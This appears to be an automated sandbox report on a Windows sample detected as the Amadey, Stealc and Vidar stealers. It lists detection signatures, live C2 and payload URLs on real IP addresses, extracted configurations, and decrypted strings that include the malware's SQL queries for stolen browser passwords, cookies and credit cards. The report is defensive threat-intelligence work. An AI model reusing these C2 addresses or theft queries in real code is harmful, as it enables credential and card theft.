Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483424
MD5: 7e43d787c0813212855c05d5cc4b1752
SHA1: 3b1dc23a3db66ca9f98742f379fde849a1039a67
SHA256: 5eb4e0358569874385f1f29eeb4f296ce648be45cc6ea62328e8a9594571859f
Tags: exeStealc
Infos:

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.16/a=t Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpOb Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/freebl3.dllO Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php/b3 Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpOe Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dllc Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php_b# Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/;1 Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.php/1 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR= Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/=1 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/soka/random.exeb3 Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.phposition: Avira URL Cloud: Label: malware
Source: http://185.215.113.16/stealc/random.exe- Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/stealc/random.exe/ Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php% Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.php3 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\userAAKKKEBFCG.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: 9fa327eb6c.exe.7968.21.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7652.19.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Virustotal: Detection: 17% Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Virustotal: Detection: 8% Perma Link
Source: http://85.28.47.31/8405906461a5200c/freebl3.dllO Virustotal: Detection: 23% Perma Link
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Virustotal: Detection: 17% Perma Link
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 42% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\userAAKKKEBFCG.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 22
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 08
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 20
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 24
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetProcAddress
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcatA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OpenEventA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateEventA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CloseHandle
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Sleep
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HeapAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcpyA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrlenA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ExitProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: advapi32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: gdi32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: user32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: crypt32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ntdll.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateDCA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ReleaseDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sscanf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VMwareVMware
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HAL9TH
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: JohnDoe
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DISPLAY
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: silence
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sila
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalLock
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HeapFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: IsWow64Process
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process32Next
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLocalTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FreeLibrary
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process32First
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DeleteFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindNextFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LocalFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindClose
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LocalAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ReadFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SetFilePointer
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: WriteFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CopyFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualProtect
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLastError
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcpynA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OpenProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: TerminateProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ole32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wininet.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: shell32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: psapi.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SelectObject
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BitBlt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DeleteObject
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoUninitialize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoInitialize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetWindowRect
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CloseWindow
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wsprintfA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CharToOemW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wsprintfW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegCloseKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetConnectA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetOpenA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetReadFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrCmpCA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrStrA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrCmpCW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PathMatchSpecA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetModuleFileNameExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RmStartSession
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RmRegisterResources
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RmGetList
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RmEndSession
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_open
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_step
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_column_text
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_finalize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_close
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_column_bytes
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_column_blob
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: encrypted_key
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PATH
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: NSS_Init
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: NSS_Shutdown
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PK11_FreeSlot
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PK11_Authenticate
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: C:\ProgramData\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: browser:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: profile:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: url:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: login:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: password:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Opera
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OperaGX
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Network
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: cookies
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: .txt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: TRUE
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FALSE
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: autofill
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: history
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: cc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: name:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: month:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: year:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: card:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Cookies
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Login Data
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Web Data
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: History
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: logins.json
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: formSubmitURL
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: usernameField
